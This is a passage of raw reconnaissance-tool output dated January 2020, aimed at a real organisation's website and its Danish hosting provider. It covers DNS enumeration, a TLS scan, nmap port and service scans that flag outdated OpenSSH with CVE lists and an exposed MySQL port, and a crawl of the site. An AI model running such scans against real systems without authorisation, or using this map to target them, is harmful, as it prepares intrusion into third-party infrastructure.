563se. 86400 IN RRSIG DS 8 1 86400 20200129220000 20200116210000 33853 . 18SrPJ2ea3bD1w4337qAsE5AqJXQcyUji/6KANdo6QNHKQya10ROwZ0W 6Eq3emdqwqcj2+flRqVZg/CzGDnnM9lSZ+x9gb0Rfuj2vbXiYqW8xLTa NjqBz+T5cc83glUK23bn3Aw3t4raPDCVwGqIp0zFwCzlVNMUZdq6pE/1 36ttiTphzHMAoUv70oYEioe1b7vohBLrrtID3awYTu7LlP6DZ94TLmSZ +po5tH68FwDgzExAdLJvRi83pBE/DaoGP6Ccc6xMcSUDQq3B3txSMCuv R7vnB/VxHEwAUkVCdnDpykdL6pvhQv7wZjTOTZ8V//kv57WtARUzfI3v W9cVew==
564;; Received 924 bytes from 193.0.14.129#53(k.root-servers.net) in 231 ms
565
566hizb-ut-tahrir.se. 86400 IN NS ns1.unoeuro.com.
567hizb-ut-tahrir.se. 86400 IN NS ns4.unoeuro.com.
568hizb-ut-tahrir.se. 86400 IN NS ns3.unoeuro.com.
569hizb-ut-tahrir.se. 86400 IN NS ns2.unoeuro.com.
570hizb-ut-tahrir.se. 7200 IN NSEC hizentra.se. NS RRSIG NSEC
571hizb-ut-tahrir.se. 7200 IN RRSIG NSEC 8 2 7200 20200129111026 20200115081042 40264 se. x50SzwKp67I1CaGsEkjP896WJMbzQATn2IqH18hqhkJ6zbJ7BGM+Hane Nc29U9EQgsOzQjqH0RzDFwrpNB7bdWc5K2KXmemnYYldKc79yGZmLAjA rEgOA2md+4mizNaXYadx71HebCHjNosG2A6iEg98mn532PRRbwIJmv8+ 93htlDum9XfnMg0nKy+D4X9s5WvALLrNe4W4kUi30H5ZrsUAApjBMYDh D8UjJ0pCeSK2mhGk/sPtlaFRo9jPC3LEztRs3XkmrKYWC0wHUS/h5WeY bgdrSPjAX5X55U8T8xF13MF8QGbFiQ51JMIhY/DpungOMBy0TD0wGWWn 3hg10Q==
572;; Received 480 bytes from 2a01:3f0:0:301::53#53(a.ns.se) in 138 ms
573
574hizb-ut-tahrir.se. 3600 IN A 93.191.156.197
575hizb-ut-tahrir.se. 3600 IN MX 10 mx.unoeuro.com.
576hizb-ut-tahrir.se. 3600 IN NS ns1.unoeuro.com.
577hizb-ut-tahrir.se. 3600 IN NS ns2.unoeuro.com.
578hizb-ut-tahrir.se. 3600 IN NS ns3.unoeuro.com.
579hizb-ut-tahrir.se. 3600 IN NS ns4.unoeuro.com.
580hizb-ut-tahrir.se. 3600 IN TXT "v=spf1 include:spf.unoeuro.com ?all"
581hizb-ut-tahrir.se. 14400 IN SOA ns1.unoeuro.com. hostmaster.unoeuro.com. 2019060300 14400 3600 1209600 3600
582;; Received 259 bytes from 85.159.211.233#53(ns4.unoeuro.com) in 315 ms
583######################################################################################################################################
584[*] Performing General Enumeration of Domain: hizb-ut-tahrir.se
585[!] Wildcard resolution is enabled on this domain
586[!] It is resolving to 93.191.156.197
587[!] All queries will resolve to this address!!
588[-] DNSSEC is not configured for hizb-ut-tahrir.se
589[*] SOA ns1.unoeuro.com 46.36.215.2
590[*] NS ns4.unoeuro.com 85.159.211.233
591[*] NS ns4.unoeuro.com 2a01:7e00::f03c:91ff:fe50:2326
592[*] NS ns2.unoeuro.com 185.25.141.15
593[*] NS ns1.unoeuro.com 46.36.215.2
594[*] NS ns3.unoeuro.com 83.217.78.186
595[*] NS ns3.unoeuro.com 2a00:1c98:10:26::10
596[*] MX mx.unoeuro.com 94.231.103.108
597[*] A hizb-ut-tahrir.se 93.191.156.197
598[*] TXT hizb-ut-tahrir.se v=spf1 include:spf.unoeuro.com ?all
599[*] Enumerating SRV Records
600[*] SRV _autodiscover._tcp.hizb-ut-tahrir.se maildiscover.unoeuro.com 94.231.108.222 443 10
601[+] 1 Records Found
602######################################################################################################################################
603[*] Processing domain hizb-ut-tahrir.se
604[*] Using system resolvers ['185.93.180.131', '194.187.251.67', '38.132.106.139', '192.168.0.1', '2001:18c0:121:6900:724f:b8ff:fefd:5b6a']
605[+] Getting nameservers
60685.159.211.233 - ns4.unoeuro.com
607185.25.141.15 - ns2.unoeuro.com
60846.36.215.2 - ns1.unoeuro.com
60983.217.78.186 - ns3.unoeuro.com
610[-] Zone transfer failed
611
612[+] TXT records found
613"v=spf1 include:spf.unoeuro.com ?all"
614
615[+] MX records found, added to target list
61610 mx.unoeuro.com.
617
618[+] Wildcard domain found - 93.191.156.197
619[*] Scanning hizb-ut-tahrir.se for A records
62094.231.108.222 - autoconfig.hizb-ut-tahrir.se
62194.231.103.107 - mail.hizb-ut-tahrir.se
62294.231.106.220 - smtp.hizb-ut-tahrir.se
623######################################################################################################################################
624 AVAILABLE PLUGINS
625 -----------------
626
627 SessionResumptionPlugin
628 CertificateInfoPlugin
629 SessionRenegotiationPlugin
630 HeartbleedPlugin
631 OpenSslCipherSuitesPlugin
632 CompressionPlugin
633 FallbackScsvPlugin
634 HttpHeadersPlugin
635 RobotPlugin
636 EarlyDataPlugin
637 OpenSslCcsInjectionPlugin
638
639
640
641 CHECKING HOST(S) AVAILABILITY
642 -----------------------------
643
644 93.191.156.197:443 => 93.191.156.197
645
646
647
648
649 SCAN RESULTS FOR 93.191.156.197:443 - 93.191.156.197
650 ----------------------------------------------------
651
652 * OpenSSL CCS Injection:
653 OK - Not vulnerable to OpenSSL CCS injection
654
655 * SSLV2 Cipher Suites:
656 Server rejected all cipher suites.
657
658 * TLS 1.2 Session Resumption Support:
659 With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
660 With TLS Tickets: NOT SUPPORTED - TLS ticket not assigned.
661
662 * OpenSSL Heartbleed:
663 OK - Not vulnerable to Heartbleed
664
665 * Session Renegotiation:
666 Client-initiated Renegotiation: OK - Rejected
667 Secure Renegotiation: OK - Supported
668
669 * Deflate Compression:
670 OK - Compression disabled
671
672 * TLSV1_3 Cipher Suites:
673 Forward Secrecy OK - Supported
674 RC4 OK - Not Supported
675
676 Preferred:
677 TLS_AES_256_GCM_SHA384 256 bits HTTP 302 Found - http://93.191.156.197/
678 Accepted:
679 TLS_CHACHA20_POLY1305_SHA256 256 bits HTTP 302 Found - http://93.191.156.197/
680 TLS_AES_256_GCM_SHA384 256 bits HTTP 302 Found - http://93.191.156.197/
681 TLS_AES_128_GCM_SHA256 128 bits HTTP 302 Found - http://93.191.156.197/
682
683 * SSLV3 Cipher Suites:
684 Server rejected all cipher suites.
685
686 * Certificate Information:
687 Content
688 SHA1 Fingerprint: 5c07943fab62063eae87bb01ef1298d0faaeac4e
689 Common Name: *.unoeuro.com
690 Issuer: Sectigo RSA Domain Validation Secure Server CA
691 Serial Number: 336869185492694657019599526345354463740
692 Not Before: 2019-02-06 00:00:00
693 Not After: 2021-02-05 23:59:59
694 Signature Algorithm: sha256
695 Public Key Algorithm: RSA
696 Key Size: 2048
697 Exponent: 65537 (0x10001)
698 DNS Subject Alternative Names: ['*.unoeuro.com', 'unoeuro.com']
699
700 Trust
701 Hostname Validation: FAILED - Certificate does NOT match 93.191.156.197
702 Android CA Store (9.0.0_r9): OK - Certificate is trusted
703 Apple CA Store (iOS 12, macOS 10.14, watchOS 5, and tvOS 12):OK - Certificate is trusted
704 Java CA Store (jdk-12.0.1): OK - Certificate is trusted
705 Mozilla CA Store (2019-03-14): OK - Certificate is trusted
706 Windows CA Store (2019-05-27): OK - Certificate is trusted
707 Symantec 2018 Deprecation: WARNING: Certificate distrusted by Google and Mozilla on September 2018
708 Received Chain: *.unoeuro.com --> Sectigo RSA Domain Validation Secure Server CA --> USERTrust RSA Certification Authority
709 Verified Chain: *.unoeuro.com --> Sectigo RSA Domain Validation Secure Server CA --> USERTrust RSA Certification Authority
710 Received Chain Contains Anchor: OK - Anchor certificate not sent
711 Received Chain Order: OK - Order is valid
712 Verified Chain contains SHA1: OK - No SHA1-signed certificate in the verified certificate chain
713
714 Extensions
715 OCSP Must-Staple: NOT SUPPORTED - Extension not found
716 Certificate Transparency: OK - 3 SCTs included
717
718 OCSP Stapling
719 NOT SUPPORTED - Server did not send back an OCSP response
720
721 * ROBOT Attack:
722 OK - Not vulnerable
723
724 * Downgrade Attacks:
725 TLS_FALLBACK_SCSV: OK - Supported
726
727 * TLSV1_1 Cipher Suites:
728 Server rejected all cipher suites.
729
730 * TLSV1 Cipher Suites:
731 Server rejected all cipher suites.
732
733 * TLSV1_2 Cipher Suites:
734 Forward Secrecy OK - Supported
735 RC4 OK - Not Supported
736
737 Preferred:
738 None - Server followed client cipher suite preference.
739 Accepted:
740 TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256 256 bits HTTP 302 Found - http://93.191.156.197/
741 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 302 Found - http://93.191.156.197/
742 TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 302 Found - http://93.191.156.197/
743 TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 302 Found - http://93.191.156.197/
744 TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 302 Found - http://93.191.156.197/
745
746
747 SCAN COMPLETED IN 24.41 S
748 -------------------------
749#####################################################################################################################################
750Domains still to check: 1
751 Checking if the hostname hizb-ut-tahrir.se. given is in fact a domain...
752
753Analyzing domain: hizb-ut-tahrir.se.
754 Checking NameServers using system default resolver...
755 IP: 85.159.211.233 (United Kingdom)
756 HostName: ns4.unoeuro.com Type: NS
757 HostName: ns4.unoeuro.com Type: PTR
758 IP: 185.25.141.15 (Denmark)
759 HostName: ns2.unoeuro.com Type: NS
760 HostName: ns2.unoeuro.com Type: PTR
761 IP: 46.36.215.2 (Denmark)
762 HostName: ns1.unoeuro.com Type: NS
763 HostName: ns1.unoeuro.com Type: PTR
764 IP: 83.217.78.186 (Belgium)
765 HostName: ns3.unoeuro.com Type: NS
766 HostName: ns3.unoeuro.com Type: PTR
767
768 Checking MailServers using system default resolver...
769 IP: 94.231.103.108 (Denmark)
770 HostName: mx.unoeuro.com Type: MX
771 HostName: mx.unoeuro.com Type: PTR
772 WARNING!! This domain has wildcards activated for hostnames resolution. We are checking "www" anyway, but perhaps it doesn't exists!
773
774 Checking the zone transfer for each NS... (if this takes more than 10 seconds, just hit CTRL-C and it will continue. Bug in the libs)
775 No zone transfer found on nameserver 85.159.211.233
776 No zone transfer found on nameserver 185.25.141.15
777 No zone transfer found on nameserver 46.36.215.2
778 No zone transfer found on nameserver 83.217.78.186
779
780 Checking SPF record...
781
782 Checking SPF record...
783 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 94.231.96.0/20, but only the network IP
784 New IP found: 94.231.96.0
785 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 93.191.156.0/24, but only the network IP
786 New IP found: 93.191.156.0
787
788 Checking 1 most common hostnames using system default resolver...
789 IP: 93.191.156.197 (Denmark)
790 HostName: www.hizb-ut-tahrir.se. Type: A
791
792 Checking with nmap the reverse DNS hostnames of every <ip>/24 netblock using system default resolver...
793 Checking netblock 94.231.103.0
794 Checking netblock 83.217.78.0
795 Checking netblock 85.159.211.0
796 Checking netblock 93.191.156.0
797 Checking netblock 94.231.96.0
798 Checking netblock 46.36.215.0
799 Checking netblock 185.25.141.0
800
801 Searching for hizb-ut-tahrir.se. emails in Google
802
803 Checking 8 active hosts using nmap... (nmap -sn -n -v -PP -PM -PS80,25 -PA -PY -PU53,40125 -PE --reason <ip> -oA <output_directory>/nmap/<ip>.sn)
804 Host 94.231.103.108 is up (reset ttl 64)
805 Host 83.217.78.186 is up (reset ttl 64)
806 Host 85.159.211.233 is up (reset ttl 64)
807 Host 93.191.156.197 is up (reset ttl 64)
808 Host 94.231.96.0 is up (reset ttl 64)
809 Host 93.191.156.0 is up (reset ttl 64)
810 Host 46.36.215.2 is up (reset ttl 64)
811 Host 185.25.141.15 is up (reset ttl 64)
812
813 Checking ports on every active host using nmap... (nmap -O --reason --webxml --traceroute -sS -sV -sC -Pn -n -v -F <ip> -oA <output_directory>/nmap/<ip>)
814 Scanning ip 94.231.103.108 (mx.unoeuro.com (PTR)):
815 Scanning ip 83.217.78.186 (ns3.unoeuro.com (PTR)):
816 Scanning ip 85.159.211.233 (ns4.unoeuro.com (PTR)):
817 22/tcp open ssh syn-ack ttl 55 OpenSSH 5.3 (protocol 2.0)
818 | ssh-hostkey:
819 | 1024 26:89:db:e3:2f:2c:2c:7a:d3:18:9a:01:99:bd:09:87 (DSA)
820 |_ 2048 29:5e:d4:4e:b4:f2:4f:01:e8:4e:e5:8c:4f:98:c0:9a (RSA)
821 | vulners:
822 | cpe:/a:openbsd:openssh:5.3:
823 | CVE-2014-1692 7.5 https://vulners.com/cve/CVE-2014-1692
824 | CVE-2010-4478 7.5 https://vulners.com/cve/CVE-2010-4478
825 | CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
826 | CVE-2016-10708 5.0 https://vulners.com/cve/CVE-2016-10708
827 | CVE-2010-5107 5.0 https://vulners.com/cve/CVE-2010-5107
828 | CVE-2016-0777 4.0 https://vulners.com/cve/CVE-2016-0777
829 | CVE-2010-4755 4.0 https://vulners.com/cve/CVE-2010-4755
830 | CVE-2012-0814 3.5 https://vulners.com/cve/CVE-2012-0814
831 | CVE-2011-5000 3.5 https://vulners.com/cve/CVE-2011-5000
832 |_ CVE-2011-4327 2.1 https://vulners.com/cve/CVE-2011-4327
833 53/tcp open domain? syn-ack ttl 55
834 | dns-nsid:
835 | NSID: ns4.unoeuro.com (6e73342e756e6f6575726f2e636f6d)
836 |_ id.server: ns4.unoeuro.com
837 | fingerprint-strings:
838 | DNSVersionBindReqTCP:
839 | version
840 |_ bind
841 Scanning ip 93.191.156.197 (www.hizb-ut-tahrir.se.):
842 21/tcp open tcpwrapped syn-ack ttl 43
843 22/tcp open ssh syn-ack ttl 45 OpenSSH 5.3 (protocol 2.0)
844 | ssh-hostkey:
845 | 1024 fa:d3:03:2f:db:82:8d:21:30:46:74:25:37:bb:fa:3e (DSA)
846 |_ 2048 e1:2a:51:40:6c:bd:91:34:21:28:ab:59:64:59:9b:4a (RSA)
847 | vulners:
848 | cpe:/a:openbsd:openssh:5.3:
849 | CVE-2014-1692 7.5 https://vulners.com/cve/CVE-2014-1692
850 | CVE-2010-4478 7.5 https://vulners.com/cve/CVE-2010-4478
851 | CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
852 | CVE-2016-10708 5.0 https://vulners.com/cve/CVE-2016-10708
853 | CVE-2010-5107 5.0 https://vulners.com/cve/CVE-2010-5107
854 | CVE-2016-0777 4.0 https://vulners.com/cve/CVE-2016-0777
855 | CVE-2010-4755 4.0 https://vulners.com/cve/CVE-2010-4755
856 | CVE-2012-0814 3.5 https://vulners.com/cve/CVE-2012-0814
857 | CVE-2011-5000 3.5 https://vulners.com/cve/CVE-2011-5000
858 |_ CVE-2011-4327 2.1 https://vulners.com/cve/CVE-2011-4327
859 80/tcp open http syn-ack ttl 44 Apache httpd
860 | http-methods:
861 |_ Supported Methods: OPTIONS HEAD GET POST
862 |_http-server-header: Apache
863 |_http-title: This server is operated by UnoEuro Webhosting
864 443/tcp open ssl/http syn-ack ttl 43 Apache httpd
865 |_http-server-header: Apache
866 |_http-title: 403 Forbidden
867 | ssl-cert: Subject: commonName=*.unoeuro.com
868 | Subject Alternative Name: DNS:*.unoeuro.com, DNS:unoeuro.com
869 | Issuer: commonName=Sectigo RSA Domain Validation Secure Server CA/organizationName=Sectigo Limited/stateOrProvinceName=Greater Manchester/countryName=GB
870 | Public Key type: rsa
871 | Public Key bits: 2048
872 | Signature Algorithm: sha256WithRSAEncryption
873 | Not valid before: 2019-02-06T00:00:00
874 | Not valid after: 2021-02-05T23:59:59
875 | MD5: 672e f1c5 0cc7 d81f 31c1 9cd8 88cc 6bcc
876 |_SHA-1: 5c07 943f ab62 063e ae87 bb01 ef12 98d0 faae ac4e
877 Scanning ip 94.231.96.0 ():
878 Scanning ip 93.191.156.0 ():
879 Scanning ip 46.36.215.2 (ns1.unoeuro.com (PTR)):
880 53/tcp open domain? syn-ack ttl 48
881 | dns-nsid:
882 | NSID: ns1.unoeuro.com (6e73312e756e6f6575726f2e636f6d)
883 |_ id.server: ns1.unoeuro.com
884 | fingerprint-strings:
885 | DNSVersionBindReqTCP:
886 | version
887 |_ bind
888 Scanning ip 185.25.141.15 (ns2.unoeuro.com (PTR)):
889 22/tcp open ssh syn-ack ttl 45 OpenSSH 7.4 (protocol 2.0)
890 | ssh-hostkey:
891 | 2048 14:8f:1f:90:fa:70:dd:8b:28:85:7d:f6:a3:f1:f7:ba (RSA)
892 |_ 256 c2:58:48:28:0f:4b:ee:10:0c:b1:4c:17:6c:ed:64:cc (ECDSA)
893 | vulners:
894 | cpe:/a:openbsd:openssh:7.4:
895 | CVE-2018-15919 5.0 https://vulners.com/cve/CVE-2018-15919
896 |_ CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
897 53/tcp open domain? syn-ack ttl 47
898 | dns-nsid:
899 | NSID: ns2.unoeuro.com (6e73322e756e6f6575726f2e636f6d)
900 |_ id.server: ns2.unoeuro.com
901 | fingerprint-strings:
902 | DNSVersionBindReqTCP:
903 | version
904 |_ bind
905 111/tcp open rpcbind syn-ack ttl 45 2-4 (RPC #100000)
906 | rpcinfo:
907 | program version port/proto service
908 | 100000 2,3,4 111/tcp rpcbind
909 | 100000 2,3,4 111/udp rpcbind
910 | 100000 3,4 111/tcp6 rpcbind
911 |_ 100000 3,4 111/udp6 rpcbind
912 3306/tcp open mysql syn-ack ttl 44 MySQL (unauthorized)
913 WebCrawling domain's web servers... up to 50 max links.
914
915 + URL to crawl: http://www.hizb-ut-tahrir.se.
916 + Date: 2020-01-16
917
918 + Crawling URL: http://www.hizb-ut-tahrir.se.:
919 + Links:
920 + Crawling http://www.hizb-ut-tahrir.se.
921 + Crawling http://www.hizb-ut-tahrir.se./hizb-ut-tahrir.se (404 Not Found)
922 + Crawling http://www.hizb-ut-tahrir.se./fonts.googleapis.com (404 Not Found)
923 + Crawling http://www.hizb-ut-tahrir.se./s.w.org (404 Not Found)
924 + Crawling http://www.hizb-ut-tahrir.se./fonts.googleapis.com/css?family=Roboto%3A400%2C400italic%2C700%2C700italic& (404 Not Found)
925 + Crawling http://www.hizb-ut-tahrir.se./fonts.googleapis.com/css?family=Oswald%3A400%2C300%2C700& (404 Not Found)
926 + Crawling http://www.hizb-ut-tahrir.se./
927 + Searching for directories...
928 - Found: http://www.hizb-ut-tahrir.se./fonts.googleapis.com/
929 + Searching open folders...
930 - http://www.hizb-ut-tahrir.se./fonts.googleapis.com/ (404 Not Found)
931 + Crawl finished successfully.
932----------------------------------------------------------------------
933Summary of http://http://www.hizb-ut-tahrir.se.
934----------------------------------------------------------------------
935+ Links crawled:
936 - http://www.hizb-ut-tahrir.se.
937 - http://www.hizb-ut-tahrir.se./
938 - http://www.hizb-ut-tahrir.se./fonts.googleapis.com (404 Not Found)
939 - http://www.hizb-ut-tahrir.se./fonts.googleapis.com/css?family=Oswald%3A400%2C300%2C700& (404 Not Found)
940 - http://www.hizb-ut-tahrir.se./fonts.googleapis.com/css?family=Roboto%3A400%2C400italic%2C700%2C700italic& (404 Not Found)
941 - http://www.hizb-ut-tahrir.se./hizb-ut-tahrir.se (404 Not Found)
942 - http://www.hizb-ut-tahrir.se./s.w.org (404 Not Found)
943 Total links crawled: 7
944
945+ Links to files found:
946 Total links to files: 0
947
948+ Externals links found:
949 - http://gmpg.org/xfn/11
950 - http://hizb-afghanistan.org/
951 - http://hizb-pakistan.org/
952 - http://hizb-ut-tahrir.se
953 - http://hizb-ut-tahrir.se/wp-content/plugins/lazy-load/images/1x1.trans.gif
954 - http://hizb-ut-tahrir.se/wp-content/plugins/lazy-load/js/jquery.sonar.min.js?ver=0.6.1
955 - http://hizb-ut-tahrir.se/wp-content/plugins/lazy-load/js/lazy-load.js?ver=0.6.1
956 - http://hizb-ut-tahrir.se/wp-content/plugins/ultimate-faqs/css/ewd-ufaq-styles.css?ver=5.3.2
957 - http://hizb-ut-tahrir.se/wp-content/plugins/ultimate-faqs/css/rrssb-min.css?ver=5.3.2
958 - http://hizb-ut-tahrir.se/wp-content/themes/flymag/bootstrap/css/bootstrap.min.css?ver=1
959 - http://hizb-ut-tahrir.se/wp-content/themes/flymag/fonts/font-awesome.min.css?ver=5.3.2
960 - http://hizb-ut-tahrir.se/wp-content/themes/flymag/js/html5shiv.js
961 - http://hizb-ut-tahrir.se/wp-content/themes/flymag/js/imagesloaded.pkgd.min.js?ver=1
962 - http://hizb-ut-tahrir.se/wp-content/themes/flymag/js/jquery.easy-ticker.min.js?ver=1
963 - http://hizb-ut-tahrir.se/wp-content/themes/flymag/js/jquery.fitvids.js?ver=1
964 - http://hizb-ut-tahrir.se/wp-content/themes/flymag/js/jquery.slicknav.min.js?ver=1
965 - http://hizb-ut-tahrir.se/wp-content/themes/flymag/js/masonry-init.js?ver=1
966 - http://hizb-ut-tahrir.se/wp-content/themes/flymag/js/owl.carousel.min.js?ver=1
967 - http://hizb-ut-tahrir.se/wp-content/themes/flymag/js/scripts.js?ver=1
968 - http://hizb-ut-tahrir.se/wp-content/themes/flymag/js/skip-link-focus-fix.js?ver=20130115
969 - http://hizb-ut-tahrir.se/wp-content/themes/flymag/js/slider-init.js?ver=1
970 - http://hizb-ut-tahrir.se/wp-content/themes/flymag/js/wow.min.js?ver=1
971 - http://hizb-ut-tahrir.se/wp-content/themes/flymag/style.css?ver=5.3.2
972 - http://hizb-ut-tahrir.se/wp-includes/css/dist/block-library/style.min.css?ver=5.3.2
973 - http://hizb-ut-tahrir.se/wp-includes/js/imagesloaded.min.js?ver=3.2.0
974 - http://hizb-ut-tahrir.se/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1
975 - http://hizb-ut-tahrir.se/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp
976 - http://hizb-ut-tahrir.se/wp-includes/js/jquery/jquery.masonry.min.js?ver=3.1.2b
977 - http://hizb-ut-tahrir.se/wp-includes/js/masonry.min.js?ver=3.3.2
978 - http://hizb-ut-tahrir.se/wp-includes/js/wp-embed.min.js?ver=5.3.2
979 - http://hizb-ut-tahrir.se/wp-includes/wlwmanifest.xml
980 - http://hizb-ut-tahrir.se/xmlrpc.php
981 - http://tahrir-syria.info/
982 - http://www.hizb-australia.org/
983 - http://www.hizb-ut-tahrir-almaghreb.info/
984 - http://www.hizb-ut-tahrir.dk/
985 - http://www.hizb-ut-tahrir.info/
986 - http://www.hizb-ut-tahrir.nl/
987 - http://www.hizb-ut-tahrir.org/
988 - http://www.hizb.org.uk/
989 - http://www.pal-tahrir.info/
990 - https://hizb-america.org/
991 - https://hizb-russia.info/
992 - https://hizb-ut-tahrir.se/
993 - https://hizb-ut-tahrir.se/158/
994 - https://hizb-ut-tahrir.se/882/
995 - https://hizb-ut-tahrir.se/900/
996 - https://hizb-ut-tahrir.se/annu-ett-forsok-att-fa-muslimerna-att-avsaga-sig-sin-islamiska-identitet/
997 - https://hizb-ut-tahrir.se/artiklar/
998 - https://hizb-ut-tahrir.se/author/admin/
999 - https://hizb-ut-tahrir.se/bocker/
1000 - https://hizb-ut-tahrir.se/broschyrer/
1001 - https://hizb-ut-tahrir.se/category/artiklar/
1002 - https://hizb-ut-tahrir.se/category/engelska-bocker/
1003 - https://hizb-ut-tahrir.se/category/svenska-bocker/
1004 - https://hizb-ut-tahrir.se/comments/feed/
1005 - https://hizb-ut-tahrir.se/de-svenska-myndigheternas-fortvivlade-forsok-att-kvava-hizb-ut-tahrirs-kall/
1006 - https://hizb-ut-tahrir.se/den-islamiska-identiteten-ar-i-fara-muslimerna-maste-agera-nu/
1007 - https://hizb-ut-tahrir.se/faq/
1008 - https://hizb-ut-tahrir.se/feed/
1009 - https://hizb-ut-tahrir.se/hizb-ut-tahrir/
1010 - https://hizb-ut-tahrir.se/intellektuella-introduktion-till-islam/
1011 - https://hizb-ut-tahrir.se/koranen-branns-med-den-danska-regeringens-valsignelse/
1012 - https://hizb-ut-tahrir.se/massakern-i-nya-zeeland-de-vasterlandska-regeringarna-och-medierna-bar-ansvaret-for-hatet/
1013 - https://hizb-ut-tahrir.se/med-ramadans-ankomst-kommer-islamfientlighetens-test-pa-muslimernas-iman/
1014 - https://hizb-ut-tahrir.se/page/2/
1015 - https://hizb-ut-tahrir.se/pressmeddelande-hizb-ut-tahrirs-kampanj-i-sverige-anvand-din-rost-men-inte-till-valet/
1016 - https://hizb-ut-tahrir.se/pressmeddelande-imam-skandalen-i-sverige-en-existentiell-kris-for-demokratin/
1017 - https://hizb-ut-tahrir.se/profeten-muhammad-fordomar-och-fakta/
1018 - https://hizb-ut-tahrir.se/videos/
1019 - https://hizb-ut-tahrir.se/wp-content/uploads/2018/02/facebook_logo_sv-210x63.jpg
1020 - https://hizb-ut-tahrir.se/wp-content/uploads/2018/03/cropped-IKON-180x180.jpg
1021 - https://hizb-ut-tahrir.se/wp-content/uploads/2018/03/cropped-IKON-192x192.jpg
1022 - https://hizb-ut-tahrir.se/wp-content/uploads/2018/03/cropped-IKON-32x32.jpg
1023 - https://hizb-ut-tahrir.se/wp-content/uploads/2019/03/37335368_273991389822135_2373824898331049984_n-1.jpg
1024 - https://hizb-ut-tahrir.se/wp-content/uploads/2019/03/AttackStockholm6April-820x546.jpeg
1025 - https://hizb-ut-tahrir.se/wp-content/uploads/2019/03/Friskola_Boneutrop_2018-1-820x251.jpg
1026 - https://hizb-ut-tahrir.se/wp-content/uploads/2019/03/WhatsApp-Image-2019-03-15-at-18.39.20-600x384.jpeg
1027 - https://hizb-ut-tahrir.se/wp-content/uploads/2019/03/WhatsApp-Image-2019-03-15-at-18.39.20.jpeg
1028 - https://hizb-ut-tahrir.se/wp-content/uploads/2019/03/danm-600x400.jpg
1029 - https://hizb-ut-tahrir.se/wp-content/uploads/2019/03/danm-820x461.jpg
1030 - https://hizb-ut-tahrir.se/wp-content/uploads/2019/03/forbudSkolaRamadan2017-1-820x774.jpeg
1031 - https://hizb-ut-tahrir.se/wp-content/uploads/2019/03/image_classroom-1-820x410.jpeg
1032 - https://hizb-ut-tahrir.se/wp-content/uploads/2019/03/kvavaKall-600x400.jpeg
1033 - https://hizb-ut-tahrir.se/wp-content/uploads/2019/03/kvavaKall-820x632.jpeg
1034 - https://hizb-ut-tahrir.se/wp-content/uploads/2019/11/imamskandalen-600x400.jpg
1035 - https://hizb-ut-tahrir.se/wp-content/uploads/2019/11/imamskandalen-820x461.jpg
1036 - https://hizb-ut-tahrir.se/wp-content/uploads/2019/12/MuslimiskaIdentitet-600x400.jpeg
1037 - https://hizb-ut-tahrir.se/wp-content/uploads/2019/12/MuslimiskaIdentitet-820x546.jpeg
1038 - https://hizb-ut-tahrir.se/wp-json/
1039 - https://hizb-ut-tahrir.se/xmlrpc.php?rsd
1040 - https://hizb.org.ua/ru/
1041 - https://mykhilafah.com/
1042 - https://www.facebook.com/Hizb-ut-Tahrir-Sverige-2338466706174842/
1043 Total external links: 94
1044
1045+ Email addresses found:
1046 Total email address found: 0
1047
1048+ Directories found:
1049 - http://www.hizb-ut-tahrir.se./fonts.googleapis.com/ (404 Not Found)
1050 Total directories: 1
1051
1052+ Directory indexing found:
1053 Total directories with indexing: 0
1054
1055----------------------------------------------------------------------
1056
1057
1058 + URL to crawl: https://www.hizb-ut-tahrir.se.
1059 + Date: 2020-01-16
1060
1061 + Crawling URL: https://www.hizb-ut-tahrir.se.:
1062 + Links:
1063 + Crawling https://www.hizb-ut-tahrir.se.
1064 + Searching for directories...
1065 + Searching open folders...
1066
1067--Finished--
1068Summary information for domain hizb-ut-tahrir.se.
1069-----------------------------------------
1070
1071 Domain Ips Information:
1072 IP: 94.231.103.108
1073 HostName: mx.unoeuro.com Type: MX
1074 HostName: mx.unoeuro.com Type: PTR
1075 Country: Denmark
1076 Is Active: True (reset ttl 64)
1077 IP: 83.217.78.186
1078 HostName: ns3.unoeuro.com Type: NS
1079 HostName: ns3.unoeuro.com Type: PTR
1080 Country: Belgium
1081 Is Active: True (reset ttl 64)
1082 IP: 85.159.211.233
1083 HostName: ns4.unoeuro.com Type: NS
1084 HostName: ns4.unoeuro.com Type: PTR
1085 Country: United Kingdom
1086 Is Active: True (reset ttl 64)
1087 Port: 22/tcp open ssh syn-ack ttl 55 OpenSSH 5.3 (protocol 2.0)
1088 Script Info: | ssh-hostkey:
1089 Script Info: | 1024 26:89:db:e3:2f:2c:2c:7a:d3:18:9a:01:99:bd:09:87 (DSA)
1090 Script Info: |_ 2048 29:5e:d4:4e:b4:f2:4f:01:e8:4e:e5:8c:4f:98:c0:9a (RSA)
1091 Script Info: | vulners:
1092 Script Info: | cpe:/a:openbsd:openssh:5.3:
1093 Script Info: | CVE-2014-1692 7.5 https://vulners.com/cve/CVE-2014-1692
1094 Script Info: | CVE-2010-4478 7.5 https://vulners.com/cve/CVE-2010-4478
1095 Script Info: | CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
1096 Script Info: | CVE-2016-10708 5.0 https://vulners.com/cve/CVE-2016-10708
1097 Script Info: | CVE-2010-5107 5.0 https://vulners.com/cve/CVE-2010-5107
1098 Script Info: | CVE-2016-0777 4.0 https://vulners.com/cve/CVE-2016-0777
1099 Script Info: | CVE-2010-4755 4.0 https://vulners.com/cve/CVE-2010-4755
1100 Script Info: | CVE-2012-0814 3.5 https://vulners.com/cve/CVE-2012-0814
1101 Script Info: | CVE-2011-5000 3.5 https://vulners.com/cve/CVE-2011-5000
1102 Script Info: |_ CVE-2011-4327 2.1 https://vulners.com/cve/CVE-2011-4327
1103 Port: 53/tcp open domain? syn-ack ttl 55
